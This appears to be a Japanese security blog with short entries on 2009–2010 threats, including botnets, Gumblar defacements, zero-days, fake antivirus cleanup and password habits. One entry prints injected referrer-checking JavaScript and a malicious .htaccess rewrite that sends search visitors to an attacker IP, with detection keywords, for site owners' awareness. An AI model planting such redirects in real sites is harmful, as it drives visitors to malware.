UnderForge of Lack

二・二六事件の日
脱出の日
パナマ運河開通記念日 1914年
咸臨丸の日
血液銀行開業記念日

----------
Operation b49 #
Cracking Down on Botnets
we have executed a major botnet takedown of Waledac, a large and well-known “spambot.”
*clap* *clap* *clap*
すばらしいっ！
トレードマークの Dr.Waledacもしばらくは出て来れないでしょう（笑）
Three days into the effort, Operation b49 has effectively shut down connections to the vast majority of Waledac-infected computers, and our goal is to make that disruption permanent. But the operation hasn’t cleaned the infected computers and is not a silver bullet for undoing all the damage we believe Waledac has caused. Although the zombies are now largely out of the bot-herders’ control, they are still infected with the original malware.
Botnetに「銀の弾丸（特効武器）」は無く、C&Cを失ったゾンビは今後も潜伏し続けることでしょう。このあたりの徹底的な掃討は各Cert、セキュリティ機関及びISPの連携が必要です。そして、それが無ければ Mega-Dのように再び復活してくることになるかもしれません。

Dismantling Waledac
Microsoft Ambushes Waledac Botnet, Shutters Whistleblower Site
正に「アンブッシュ」ですね。
いずれにせよ、Botnetに堕ちるようなPCを運用していることが問題であって、そういう環境を一日も早く払拭することが重要です。

続く？
----------
MS KILLED Whistleblower site, too? #
ところで、Cryptome.org と今回の一件の因果関係が良くわからないのですが・・・
Microsoft Takes Down Whistleblower Site, Read the Secret Doc Here

Microsoft's wiretap guide goes online, security site goes offline
Long-established privacy and cryptology website Cryptome.org was pulled offline on Wednesday after Microsoft launched a legal offensive over its publication of Redmond's guide to internet wiretapping.
Cryptome restored after Microsoft change of heart
Microsoft to Withdraw Copyright Complaint, Cryptome Coming Back Online
Network Solutions says it will announce the withdrawal of the DMCA copyright complaint by Microsoft and the return of Cryptome online later this morning.
DMCAの濫用ともとれる内容ですが、何だかよくわかりません。

----------
しくしく
MS の Complaint PDFを開こうとしたら固まるので時間取られました・・

----------
tDiary #
tDiary 付属のプラグイン tb-send.rb におけるクロスサイトスクリプティングの脆弱性
update: tDiaryの脆弱性に関する報告(2010-02-25)
問題が発現するブラウザに制約があり、現在のところ確認されているのはIE7を使って日記を更新する場合のみになります(これより古いブラウザでも発生する可能性がありますが、開発元では確認していません)。Firefox、Opera、Safariなどの主要なブラウザでは発生しておりません。
また、tDiary 2.2に特有の問題であり、tDiary 2.3では発生しません。さらに、tb-send.rbプラグイン(TrackBack送信プラグイン)が有効になっている場合のみに発生します。
すごいピンポイントなんですね。

tDiary Unspecified Cross-Site Scripting Vulnerability 2

----------
so-net articles #
サイト改ざん猛威：「8080」がコード変更、「Gumblar.x」も攻撃再開
大手サイトの改ざんがおおむね沈静化し、メディアでの露出度がめっきり減った「ガンブラー」だが、そんな表向きの情勢とは裏腹に、ネット上では相変わらずの改ざん/再改ざんが繰り広げられている。
サイト改ざん猛威：ウイルス感染を100％防げる「ソフトウェアの更新」を
これらは、ウイルス感染を防ぐための基本対策の一部に過ぎないのだが、たったこれだけで、現行のGumblar.x/8080のウイルス感染を100％防ぐことができる。これは、この数か月間変わらぬ内容なのだが、実施していない方が多いというのが実情のようだ。
サイト改ざん猛威：感染パソコンの修復は「OSの再インストール」が近道
ダウンロード機能やアップデート機能も持っているため、感染後もシステムをいじり放題。感染パソコンを感染前の状態に戻すのは、ほとんど絶望的と考えるのが賢明だ。
いつもいつも的確な記事をありがとうございます。

----------
SQL #
モンベルの報告書：
不正アクセスによる情報漏えいの内容
不正アクセスの日時・攻撃手法
日時：2010年1月25日午前3時39分～1月26日午前6時37分にかけて断続的に
攻撃元：海外（中国のIPアドレス）
攻撃手法：弊社ウェブサーバー内のデータベースに対する「SQLインジェクション」（コンピュータ言語を悪用し、データベースを不正に操作する攻撃方法）。
※ガンブラー・ウイルスによる攻撃ではありません。
SQLインジェクションなら、使用していたCMSも公開して欲しいなぁ・・オリジナルだったらショウガナイですが。

参考：
Anatomy of a SQL Injection Attack

----------
Picasa #
Google Picasa JPEG Processing Integer Overflow Vulnerability 3

Update to version 3.6 build 105.41.

----------
IBM Tokyo SOC #
ZeuSの国内レポートは貴重ですね
東京SOCでのZeus/Zbot検知状況【Tokyo SOC Report】
これは、1～3 のウィルス・ファイルのダウンロードがクライアントPCにて発生した件数をカウントしています。
毎月5件程度のダウンロードが確認されています。昨年、感染を拡大したGumblar.X攻撃によるウィルス・ダウンロードと比べると検知件数が大幅に少ないことが分かります (Gumblar.X攻撃によるウィルス・ダウンロードは、2009年10月には約2千件確認されていました(*2))。様々なベンダーから、 Zeus/Zbotに関連する不審なメールが出回っているという情報が日々公開されていますが、実際の被害に遭う事例は少ないようです。
グラフの縦軸が １桁なのに注目！

国内の ZeuS の感染事例は確かに少ないようですね。

----------
Skypeのspam #
skypeに届くspam
確かに最近多いですね・・

----------
RSA conference #
RSA 2010: Top 15 Conference Sessions You Shouldn't Miss

Conference Stuff

----------
(笑) #
Teaching Some Security. Asking for help!
最高！
日本語版も作ってあげてください。

----------
pass-the-hash攻撃 #
Pass The Hash
良く知らなかったのですが、暗号化（Hash'ed）された文字列そのものを盗んで、正規パスワードを知ることなくアクセスできるという攻撃手法です。

詳細：
Pass-the-hash attacks: Tools and Mitigation

----------
Twitter釣り続行中 #
「This you????」　TwitterのフィッシングDM、日本でも出回る

This you?? What's the point of phishing a Twitter account?

----------
Password #
「パスワードの使い回しを防ぐ方法教えます」――米セキュリティ企業
パスワード使い回しの危険を避ける便利な方法――Websenseが紹介

元：
Top Secrets About Your Passwords

もういっそ覚えられないパスワードにして、マスターパスワード設定できるアプリ（きちんとマスターパスワードとの合成暗号化を行っていることが必須条件ですが）に記憶させ、パスワード自体はtxtにメモって自分で暗号化かけてFD（笑）にでも保管しておくとか・・・いろいろ考えるのですがなかなかうまくいきませんね。

----------
8080 #

	count	ASN	登録	更新
94.23.11.38	25651	AS16276	02/17 10:35:20	02/26 08:50:05
91.121.24.139	21513	AS16276	02/17 10:35:20	02/26 08:50:05
91.121.108.53	20140	AS16276	02/17 10:35:20	02/26 08:50:05
91.121.7.26	13879	AS16276	02/20 05:50:34	02/26 08:50:05
89.149.244.211	8656	AS28753	02/20 08:30:31	02/26 08:50:05
89.110.147.181	4545	AS24989	02/17 13:30:59	02/26 08:30:05
62.75.218.192	3069	AS8972	02/17 12:30:27	02/26 05:30:05
85.14.202.210	346	AS13301	02/20 04:50:59	02/25 05:30:05
91.204.116.114	81	AS44976	02/24 23:30:07	02/25 04:50:05
78.41.156.236	444	AS6908	02/18 20:00:43	02/25 03:40:08
92.51.132.101	63	AS20773	02/20 14:50:38	02/24 04:40:18
91.121.172.32	11262	AS16276	02/17 10:35:20	02/24 03:40:20
80.69.74.73	10835	AS20857	02/17 10:35:20	02/24 03:40:20
188.72.211.253	6765	AS28753	02/17 10:35:20	02/24 03:40:20
87.233.139.100	3286	AS15703	02/17 10:35:20	02/24 03:20:08
77.68.44.169	2036	AS15418	02/17 10:35:20	02/23 21:20:18
213.251.164.84	2036	AS16276	02/17 10:35:20	02/23 21:20:18
78.31.107.49	2036	AS24931	02/17 10:35:20	02/23 21:20:18
188.40.118.68	2036	AS24940	02/17 10:35:20	02/23 21:20:18
94.23.199.154	2036	AS16276	02/17 10:35:20	02/23 21:20:18
91.121.180.112	2034	AS16276	02/20 00:30:36	02/23 17:30:22
91.121.221.181	4114	AS16276	02/19 23:30:35	02/23 15:40:16
85.17.58.10	375	AS16265	02/20 06:50:47	02/22 14:01:22
78.46.46.3	51	AS24940	02/20 04:30:27	02/22 03:00:48
88.80.221.41	380	AS39023	02/18 06:40:49	02/22 00:30:56
91.204.116.79	76	AS44976	02/20 04:50:59	02/21 02:40:36
84.200.227.144	299	AS31400	02/17 12:30:27	02/20 23:30:33
87.106.247.193	55	AS8560	02/17 19:40:50	02/20 23:30:33
91.121.78.185	144	AS16276	02/20 00:40:38	02/20 06:30:57
213.186.60.175	60	AS16276	02/20 00:30:36	02/20 05:20:33
95.168.170.89	50	AS28753	02/19 22:40:46	02/20 04:20:39
91.121.1.99	101	AS16276	02/17 21:00:39	02/19 08:20:32
213.251.133.159	76	AS16276	02/17 18:00:50	02/19 06:20:46
88.191.63.28	7	AS12322	02/20 04:50:59	---
82.192.88.35	5	AS16265	02/19 21:20:43	---
91.121.74.84	5	AS16276	02/19 21:20:43	---
91.121.93.220	5	AS16276	02/19 21:20:43	---
91.121.142.111	5	AS16276	02/19 21:20:43	---
217.23.5.27	5	AS49981	02/19 21:20:43	---

----------
Google Safe Browsing #
| 1267128034 | B | [goog-black-hash 1.51835 update]
| 1267128002 | M | [goog-malware-hash 1.19636 update]
| 305324 | -1981(307305) 漸減中
| 1410089 |
EoF

清水トンネル貫通記念日 1929年
シャンソンの日 1990年、銀座のシャンソン喫茶の老舗「銀巴里」が閉店

----------
君の名は？
「GNU GPL」「CODE1」改竄が止まらない
Twitter / rltm: 何も知らない人がライセンスについて調べようと検索したら"ウイルスの情報ばかり。怖いからGPL(を採用するのは/のソフトを使うのは)やめよう・・・とかね。"
これは困りましたね（苦笑）

.ru:8080 のインジェクションは実に由緒正しい（！？）もので、６月頃から存在していました。その頃は Gumblar=Martuzがテイクダウンした直後に始まった、複数単語.cn:8080 と、３文字.ru:8080 に分かれて攻撃がちまちま続けられていたので、自分でもドレがどっちなのかよくわからなくなっています。

複数単語.cn:8080 の例 -- 2009.06.28

３文字.ru:8080 の例 -- 2009.07.26
※この頃、ちょうど Adobe Flashのゼロデイでしたね（トオイメ）

インジェクションの最終受け入れ先を賞賛して
LeaseWebインジェクションとでも名づけてやろうかと思いましたが

Alex de Joode
As to our abuse handling:
When we receive a abuse notification about an ip address we will forward the notification to our reseller with a 24 hour response time. For malware/phishing sites we use a shorter limit. If the reseller/customer fails to respond we normally will null the ip un till the customer has contacted us and ensures us he will remove the offending site/code.
泣きを入れている模様
（もっとも、Unmask ParasiteのDenis氏に、突っ込みを受けてますがネ）

OVH? こっちも由緒正しい防弾ホストですが、あまり取り沙汰されることがありませんね。

良い呼び名が思いつきませんでした、ごめんなさい。

続く
----------
8080（仮称）続報
新手の正規サイト改ざん(1)：国内で急速拡大～ホンダ、信越放送も被害に
新手の正規サイト改ざん(2)：一般ユーザーの方、サイト管理者の方へ
感染サイトを見つけたら、まずはこの２つを貼り付けるかメールで送信してあげてください（笑）
私はもう、個々のサイトへの注意をやる気力がありませんので・・・

偽ウイルス対策ソフト『Security Tool』。改ざんサイト経由の感染が原因？ -- 無題なブログ

昨日、WinAMPの穴ぼこの話を書いたばっかりなのに、コレですか・・

Security Toolsも由緒正しい（いらんわ！）偽セキュソフトですね。
Remove Security Tool and SecurityTool (Uninstall Guide)
BleepingComputerが削除ガイドを出しています。
一番厄介なのが、駆動中のプロセス（ランダム）がありとあらゆる妨害を行うので、
1) rKill.com を使うか、タスクマネージャの代わりになるツールを用いて、以下の怪しげなプロセスを殺します
　８桁の数字で表されているもの.exe
　Security Tool.exe
　uninstall.exe
　doguzeri.dll

2) 再起動せずに Malwarbytes' Anti-Malware を駆動させ、マルウェアを消し去ります。
Malwarebytes' Anti-Malware

手動でレジストリの掃除、ファイルの除去を行ってもよいですが、あまりにも多すぎるためお勧めできません。

参考：上記手順の詳解
セキュリティーソフトを装ったウイルス
参考：HijackThis Log
security toolsが表示され困っております。

微妙に続く
----------
New Wave launched Adobe ZERO-DAY
そして、とうとうこうなってしまいました
Trojan-Downloader.Win32.Agent.cygn
見るだけでもイヤになるビヘイビアですが、これに感染したらアウトどころの騒ぎではありません。
ZeuS系botから送信されています。
yourenter.com AS15435 KABELFOON
load.php 18/41 (43.90%)

Win32/Multidropper.HC

なぜAdobe (Acrobat) Readerは JavaScriptをしつこく ON にするのか？
Adobe Readerの未修正の脆弱性を突いた攻撃が確認される
Adobe 0-day in the wild - again
I've always loved how Adobe claims that Reader's scripting is enabled by default, due to claims that "enterprise customers require it".
どこのエンタープライズ用途で PDFのJavaScriptを使ってるんだ！

使ってます
日本工業標準調査会：データベース検索-JIS検索
orz...

----------
Twitter BAN'ED Password
Twitterで使ってはいけない370のパスワード
（苦笑）

Twitter banned passwords
Twitter and Avoiding Weak Passwords -- The WunderCounter

----------
IIS zeroday
Microsoft puts up a blurb on their website about the IIS 0day.

New Reports of a Vulnerability in IIS
なんか不承不承って感じ・・

----------
あなぼっこ

Fujitsu Products SSL Implementation Multiple Vulnerabilities 3
Fujitsu Interstage and Systemwalker SSL Vulnerabilities
InterstageやSystemwalker関連製品などのSSLセキュリティ脆弱性の問題 (2009年11月13日)

Best Top List Arbitrary File Upload and Cross-Site Scripting Vulnerabilities 4
no patch
Restrict access to the banner-upload.php script (e.g. via .htaccess). Edit the source code to ensure that input is properly sanitised.

----------
時間切れ：

How this weekend's attempted Terrorist attack relates to IT.
米デルタ航空機の爆破未遂に関連して・・・

It's been 10 years
DNS server(Port53)なんか、もう使ってるところは無さそうですが（断言はできませんが）・・・悪意のあるポートスキャンはショッチュウありますね

Good Guys Bring Down the Mega-D Botnet
その後どうなったのか？

----------
| 1262030458 | B | [goog-black-hash 1.47594 update]
| 1262030419 | M | [goog-malware-hash 1.18237 update]
| 325650 | -648(326298)
| 1188297 |
EoF

税関記念日 (1872年、運上所の呼称を「税関」に統一)
太平洋記念日 (フェルディナンド・マゼランが、マゼラン海峡を通過)

----------
Black Hat SEO poisoning

SEOという言葉を知らないWEB屋さんはあまりいないと思いますが、SEO汚染の話はどうなんでしょう？
先日紹介した、正規blogが大規模なSEOスパムを発生させ、FakeAVへの誘導を行っているという記事 Google Search Results Significantly Poisoned の続報です。

Rogue blogs redirect search traffic to bogus AV sites. Part 1.
Rogue blogs redirect search traffic to bogus AV sites. Part 2.
このblogを使ったSEO汚染攻撃は、以下のようなスキームで成功しています。

1. 攻撃者は正規サイトのサブディレクトリにblogエントリを作成する
2. blogは各postが、Googleによる投稿タイトルでのSERP(検索結果）に、それぞれ5つの画像イメージの結果を返すように構成されている
3. 各blogのタイトルは、微妙にポピュラーではないキーワード（たとえば “blue mustang picture“, “upstate ny photos“, “pictures of 2008 cadillac“, “cinderella story pictures“, “fan remote wiring diagram“... など）を使用している。
4. これらのBlogポストそのものを直接見ても無害だが、Google上の検索結果をクリックすると、FakeAVのサイトにリダイレクトされる（それらは実際にはトロイの木馬だ）
5. すべてのblogは全く同じ構造をしており、Googleをターゲットにしてからずっと、容易に「検索」によって探し当てることが可能。たとえば、"allinurl:albums/bsblog/category" というキーワードでは 295,000ものヒットがある。

そして以下のようなスクリプトによって、検索エンジンを経由してきた（リファラーチェック）時だけ別の場所にリダイレクトされます。
if ( document.referrer && document.referrer != '' && (document.referrer.match(/msn/i) ||
document.referrer.match(/live/i) || document.referrer.match(/altavista/i) ||
document.referrer.match(/baidu/i) || document.referrer.match(/yahoo/i) ||
( document.referrer.match(/google/i) && (document.referrer.match(/imgres/i) ||
document.referrer.match(/search/i) || document.referrer.match(/blogsearch/i) ) ) )) {
if (top.location.replace) {
top.location.replace(url);
}
else {
top.location.href = (url);
}
こうして、GoogleBotにはMalware判断されない、リダイレクタが誕生しています。

もし、自分のサイトがこのようなリダイレクタの踏み台になっている場合、 .htaccess に以下のような記述があるかもしれません。
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]

対策は何度も言うように FTP を使用しないことにあります。
どうしてもFTPを許可しなければならない場合、TCPラッパによるアクセス制限を含めた管理アクセスが重要になるでしょう。
また、SFTP/SCPアプリケーションにパスワードを保存しないでください。

感染しているかも？と不安なサイト管理者は、全サーバ内のファイルから以下のキーワードをGREPし、オリジナルファイルにその記述が存在するかどうか確認してみるのが良いでしょう。
mdblog
bmblog
bmsblogs
bsblog
blog (このキーワードはあってもおかしくなさそうですが・・・)

----------
P3P
Illegal games? Pay the price - publicly!
Setup.exeが実行されると、特定のサイトから画像ファイル(.bmp)のダウンロードを試みます。この画像をベースに、ユーザの個人情報（フルネーム、ゲーム用のパスワード、電子メールアドレス、郵便番号、住所、性別、会社名、電話番号）を入力するように強要されます。このゲームをプレイしたいと必死な(desperately)人は、こうした（個人情報の入力）行為をオンライン上で行うことがどれほど危険、そして何度でも要求されるであろうことに思い至らず、急いで入力してしまうかもしれません。そして、その情報とともに自分のデスクトップの画面が、Web上にさらされていることに気がつくことになるでしょう。
これは恥ずかしい・・（苦笑）
Infostealer.Kenzero

Puppet様のとこで記事にされてたコレのことなのかな？
あれこれ
shareで落とした割れエロゲのsetup.exe踏んで個人情報が流出される:【2ch】ニュー速VIPブログ(`･ω･´)
↑のポスト内
ウイルスバスターがSetup.exeに反応
遅いよ・・・（笑）

MD5:0x7D69A51FD4E2C7E62B5F7AAADDD50B56
112.78.219.142 as users96.heteml.jp (現在は当該ドメイン停止中）

hetemlも災難だなぁ・・（せっかくロリポと域帯分割してるのに）
user96サーバの人は、移転を願い出たほうがいいかもですね。

----------
Norton？

Windowsロゴが出た後、真っ黒の画面にマウスカーソルだけ。はNortonが入っていても…。

「Gumblarウイルス」にも多層防御は有効、シマンテックが解説 -- 2009.05.26

安全神話なんか、紙よりも軽いものです・・

----------
SSH辞書攻撃Password
Do and don’ts for p@$$w0rd$
Trivia: One attacker tried more than 400,000 user name and password combinations.
そんなIPは塞いでしまいなさい！

l33tモードが強いのはもっともですが、日本人的には
Password = 8suwa-do とかにすると、まず英語圏のアタッカーにはわからないのでは？とか思っています（笑）
※あくまで例ですので、この文字列で攻撃しないでね

andrew/andrew って多いのかな？
WARDNA!?

----------
短縮URL対策
ブラック・フライデイ 2009

LongURL
TinyURLの逆ですね（笑）
FirefoxのAdd-on (LongURL Mobile Expander 2.0.0 )もあるようですので、Twitter愛好者の方は検討してみてください。

----------
Virus作成で就職活動
「初のiPhoneワーム」作者、アプリメーカーに就職へ

でじゃぶ：
Twitterに新たなワームの亜種出現、作者は17歳の少年？ -- 2009.04.20
ワームの亜種の出現と同じタイミングで、exqSoft Solutionsという会社がこの少年をWebアプリケーション開発者として採用したというニュースが報じられた。

----------
WebBrowser pierce Local Access
JavaScriptからローカルファイルシステムへのアクセスを可能にするFile API、標準化へ一
File APIを利用することで、たとえばローカルのテキストファイルを読み込んでテキストエリアにその内容を入力する、といった処理がクライアントサイドだけで実装できるようになる。また、セキュリティ的な問題を発生させないよう、フォームの＜input type="file"＞要素でユーザーが指定したファイルのみにアクセスできるような制限が課せられているとのこと。
File API
Firefox 3.6β4公開　ローカルファイル処理が可能に

セキュリティ的な懸念を払拭するために色々協議し、実装しても、その穴を突くものが現れるのがこの世界なので・・かといって、新技術を否定し続けるわけにも行かず・・・
利便と安全の天秤は今後も振れ続けるのでしょうか？

----------
らんちょんみ～と

NetGamerはMalwareの夢を見るか？
Spammer believes WOW users are sad lonely men.
そして、WOWのパスワードを盗まれます・笑

トワイライトの第２弾、NewMoonの映画公開が迫る中、プレビューを謳う詐欺サイトが増えている・・とか？
注意：WOTカード真っ赤なので注意してください↓
http://blogs.paretologic.com/malwarediaries/index.php/2009/11/27/new-moon/

----------
スパコン
長崎大学のスーパーコンピュータがIEEEの「ゴードン・ベル賞」（価格性能部門）を受賞
スパコン開発で「ゴードン・ベル賞」　長崎大助教ら受賞　「国内最速」安価で実現
3800万円！

一方、米陸軍は？
Sony still subsidizing US military supercomputer efforts
The US military has announced plans to buy 2,200 more of the game consoles, so that they can massively beef up the processing power of an existing, PS3-based supercomputer.

----------
Windows 8
『Windows 8』、2012年には登場か？
Windows 8、リリースは2012年予定
最近あんまりLinux陣営の動きが無いですよね・・

----------
Google
新聞に拒否されてもGoogleは痛くも痒くもない–という驚異の調査結果
そういえば、最近GoogleがTV-CMやってますね
さがそう。検索ワードでつくる30秒の｢検索ストーリー｣

----------
Wikipedia
Wikipediaの編集者、大幅に減少中
ふ～んとか思ってたけど
Wikipedia’s Volunteer Story
Wikimedia財団、Wikipediaの投稿者数減少に関する報道についてコメント
Wikipedia運営団体、「ボランティア編集者激減」の報道に反論

/.のコメントにもあるように、一部の恣意的な記事や、何度も間違いが書き戻される「サルカニ合戦」状態は見苦しいですよね[要出展]（笑）

----------
| 1259370066 | B | [goog-black-hash 1.45382 update]
| 1259370014 | M | [goog-malware-hash 1.17505 update]
| 367280 | -3764(371044)
| 1054892 |
EoF

幼稚園記念日
録音文化の日
いいいろの日

----------
月曜の朝なので、まだ何もありませんが・・・

----------
Gumblar CompromiZed List

Unmask Parasitesが Gumblar.Xの陥落サイトリストを更新中です
現時点で 245・・・

きりが無いといえばそれまでなんですが、とりあえずGoogleセンセへお問い合わせ：

あまりにも長すぎるので別紙
という感じで、割とブロックしてる感じですね
もっとも、ここに上げられていないものが遥かに多いのですが・・・

----------
JUST RUN

家庭内ITサポートの荷を軽くするには？
「身内」ってのがどの辺なのか？にもよりますが、危なそうなら最新OSを使わせるのが一番ですね。Skypeに画面の共有機能がありますので、リモート操作ではなく、画面を見ながら相手に操作させることも可能になりました（感謝！）　ハードウェアレベルの障害で無い限りは、概ね平穏になりましたね。

問題は身内で無い場合・・・
特にウィルス感染した友人の友人の・・（以下略）なんて環境へのインストラクションなんか絶対に無理だと悟りました・・・

----------
財布へ

Best Tool For Remembering Passwords?
パスワード管理の秘策は？
本家/.では「パスワードのみ紙に書いて財布に入れておく」というアドバイスが5点を獲得している。パスワードのみ書き留めておき、「何の」パスワードかは頭に入れておけばいいということらしい。

「何のパスワードなのか」もメモに書いてあるっと・・・

----------
GSB:
| 1258246871 | B | [goog-black-hash 1.44446 update]
| 1258246812 | M | [goog-malware-hash 1.17193 update]
| 359634 |
| 975019 |
EoF

文化の日は1948年までは明治節）
文化勲章授章式
まんがの日(手塚治虫氏の誕生日。漫画の日は2/9の命日に制定されている）
ハンカチーフの日(マリー・アントワネットがルイ16世に「ハンカチーフの形は正方形にすべき」という政令を発布させたことに因む)
レコードの日
いいお産の日
ゴジラの日
みかんの日
文具の日
全日本剣道選手権大会

----------
2009 1H(Q1-Q2) Security Intelligence Report

Microsoftより、2009年上半期のセキュリティ・レポートが公開されました。

マイクロソフト セキュリティ インテリジェンス レポート 第 7 版 (2009 年 1 月 ～ 6 月)
日本語サマリだけでも27ページあります。

Security Intelligence Report v7 is Now Available
セキュリティ インテリジェンス レポート 第7版(2009年上半期)
最後に、日本は、今回感染率が、悪化したものの世界的に感染率の低い国には変わりなく、この低い理由を、IPA様の協力を得てベストプラクティス(最善策)としてまとめています。普段目にすることのない、いろいろな人の活動が少しだけ垣間見えるかもしれません。
※上述、日本語サマリ(Microsoft_Security_Intelligence_Report_volume_7_Key_Findings_Summary_Japanese.pdf)の最終頁参照

流し読みで見てとれるのは・・・・・
Win32/Taterfファミリ（ネットゲームのパスワード窃取トロイ）が相変わらず多いこと。
参考：オンラインゲームのパスワードを狙うウイルスが猛威、目的は「金銭」

Confickerの感染例が一般にはほとんどなく、企業内が多いこと（イントラの内側から侵食されるケースが多い）
XPの感染例が圧倒的に多いこと
CVE-2007-0071 (9.0.115.0 and earlier, and 8.0.39.0 and earlier) なんて代物がまだ影響を及ぼしていること（苦笑）
参考：Flash Playerのセキュリティ脆弱性に対処するためのアップデート公開 -- リリース日：2008年４月８日

ちなみに、この情報は MSRTにより実際に駆除された数のサマリーをベースにしていますので、（正常に稼働している）セキュソフトによって駆逐された数は含まれていません。
逆説的にいえば、ノーガードに近いPCの最後の防壁として MSRTが機能していることを示しています。

----------
Gumblar Magnified

Gumblarは現在機能停止中らしいのですが（自主規制なのか、インジェクショングループの抗争なのかは不明）
Gumblar update

7798	7271	＝1	UNITED STATES*
1765	499	↑7	INDIA
1332	345	↑12	ARGENTINA
1244	540	↑5	TURKEY
1094	704	↓2	RUSSIAN FEDERATION
1084	510	↓6	GERMANY
968	--	↑20+	SPAIN
950	619	↓4	ISLAMIC REPUBLIC OF IRAN
881	675	↓3	REPUBLIC OF KOREA
878	--	↑20+	MOROCCO
822	--	↑20+	CANADA
822	--	↑20+	PERU
792	487	↓8	JAPAN
712	400	↓9	THAILAND
689	--	↑20+	AUSTRIA
678	163	↑17	ROMANIA
655	382	↓10	POLAND
654	--	↑20+	ISRAEL
628	--	↑20+	SWEDEN
599	173	↓16	ITALY

Chinaが無いのが何故？とか思うんですが、ウォッチしている中国系のセキュリティレポートにも Gumblar系の話はあまり上がっていません。
あと、VTを使うなら実URLを載せるか、MD5/SHA1を公表するかしてほしいな

そういえば、真っ暗病の回復手段の詳細がITproに記載されていました。
Win32/Daonolの亜種に感染！セーフモードでも起動できないパソコンを復旧するには？
復旧方法はいいんですが、その後オーナがしなければならない対処を全く記述しないってのもどうなんでしょう？とか思うんですが・・・

----------
Pushdo/Cutwail revived

だれだ、レイズデッドさせたのは？（苦笑）
Malware Conceals Itself as Boss’s Letter
Cutwailスパム継続中 「Hello Darling」
しかし、古典的なスパムですね。やっぱ、スルーしてもいいか、、、
（笑）

年末年始のBotnet-spamの活動時期に差し掛かっていますので、メールサーバのspamフィルタ管理をされている方は注意を怠らないようにしましょう。

----------
National Cyber Security Awareness Month
は終わりました。

SANSの特集へのリンク集
Cyber Security Awareness Month 2009 - Summary and Links

終わりましたが、セキュリティへの取り組みはエンドレスです。
Next steps in cyber security awareness

セキュリティに対する認識やリテラシーを高める為には、日々の研鑚が必要ですが、それはほんの些細なことです。穴に落ちてしまう前に穴の位置を知っておくことが最も重要なことだと考えています。

・パスワードを入力する前に、本当にそれが必要なのかどうか１０秒くらい考えてみる。
・いままで普通に使えていたサービスが突然パスワードを聞いてきたとき、そのサイトが本当に自分のログインしようとしている先なのかチェックしてみる。
・モバイル通信を行う際に、WiFiやFONでパスワード送信しても大丈夫かどうか考えてみる。
・emailでソフトウェアアップデートの御案内が来たとき、その送信元が本当に正しいものなのか確認してみる。
・emailに記載されたURLをクリックした後、URLが見知らぬところにリダイレクトされていないかどうかチェックしてみる。
　※クリックしてる時点でアウトって説もありますが・・・

こいうったことは、習慣化することが必要なのでしょう。
※パスワード強度の話は、また別ですかね？

----------
Passwordの寿命

Password rules: Change them every 25 years

一般的に言われているパスワードの寿命は 90日です。
これは、謂わば呪文のように何度も聞かされ耳にタコが出来ている方もいらっしゃるかもしれません。

そうした、「パスワードを９０日ごとに変更しなさい」というルールは、この四半世紀変わっておらず、パスワードの寿命に関するルール定義そのものを２５年たった今、見直す必要があるのではないか？というオハナシです。

あなたは９０日御気にパスワードを変更していますか？
システムが強制的にパスワードを変更させる場合でも、一度違うパスワードを入力後、即元のパスワードに戻したりしていませんか？（苦笑）

----------
Joomla Jumi Components

CMS Joomla! の プラグイン、Jumiに深刻な脆弱性があり、任意PHPコードをサーバ内で動作させられてしまうとのことです

Issue 45: BACKDOOR in JUMI 2.0.5
Please remove JUMI2.0.5 from the download page immediately to stop people falling victim to this.
It will be simple enough to remove the compromised code from this download, but you need to do
a full security audit on your site as well as you have been compromised.

当該プラグインを使用中の方は急いで対処しましょう。


----------
ナイジェリア詐欺：イラク版

WTF is britisharmy.co.uk?
Lt.Col James Dox of the 1st Battalion 63rd Armor Regiment recently contacted me.
やけにまた具体的な部隊名ですこと・・

----------
ny!

NTTコミュニケーションズ、Winnyのウイルス感染で顧客情報流出
同社は再発防止に向けて、全社員および委託先に対し情報管理のさらなる徹底・強化を図るとしている。

自社でP2P域帯規制しておいて身内が使ってるんじゃ、根拠薄弱って言われそうですが・・

----------
クリーンインストール

Windows 7 upgrade version: The dos and don'ts
『Windows 7』アップグレード版のクリーン インストールに MS が警告

さて・・そろそろ Win7を入れないといけないんですが、なにも予備知識がない（笑）
というか Vistaから上げる必要も本当は無いんですが、テスト環境で１台は必要なので・・

勉強しておきますかネ・・
Windows 7、実はややこしいアップグレードの条件
Windows 7 のアップグレード版とアップグレードインストール -- 世の中は不思議なことだらけ

----------
gaming-scam

詐欺まがいが蔓延―ソーシャル・ゲームの邪悪のエコシステムは放っておけない
私がなぜこれを「エコシステム」と呼ぶかといえば、放置しておけばそれ自身でどんどん悪質化するサイクルが生じているからだ。ユーザーは紹介料目当てのインチキに誘い込まれる。ゲーム・サイトは金を儲ける。儲けた金はFacebookとMySpaceでのゲームの広告に使われ、ますます多くのユーザーを集める。

日本でも、ゲーム内アバターにひどい値段をつけて、「無料」「無料」と連呼しているトコは未だに健在なんですけどね～

----------
今朝は寒かったですね・・

EoF

台風お見舞い申し上げます。

寒露
二十四節気の1つ。太陽の黄経が195度の時で、霜が冷気によって凍りそうになるころ。
コンビニATMの日
1999年10月8日、イーネットが全国で初めての共同コンビニATMを設置した。
入れ歯の日 (歯科技工の日)
「い（1）れ（0）ば（8）」
骨と関節の日
「ホネ」の「ホ」を漢数字の「十」と「八」に分解したもの。
FX(外国為替証拠金取引)の日
ダイワフューチャーズ（現・ひまわり証券）が1998年に国内で初めて個人投資家向けにFXの提供を開始した。

他に、プリザーブドフラワーの日、国立公園制定記念日、レーザーディスクの日、足袋の日、木の日など

----------
Hotmailのパスワード流出は本当にフィッシングなの？

Were Stolen Hotmail/Gmail Accounts Really Phished?
数ヶ月前に何度も発生したマルウェアによるFTP Credentialの流出により、犯罪組織は6000以上の FTPアカウント情報の窃取に成功しています。それらはフィッシングとは関係なく、キーロギングやMan-In-Middle攻撃によるものです。

盗まれたデータは、(該当する場合の)Windows Live ID、ユーザ名、パスワード、およびその犠牲者が訪れた"セキュアなサイト"のURLが表示され、ブラウザタイプ(IEやFirefox)、任意のFTPの IDとPasswordを含んでいます。更に個々の被害者の Credentialを彼らが使用していたInternetアプリケーション・サーバ別に Steam、Trillian Outlook Google Talk などにそれぞれ紐付けしてリストアップされていました。

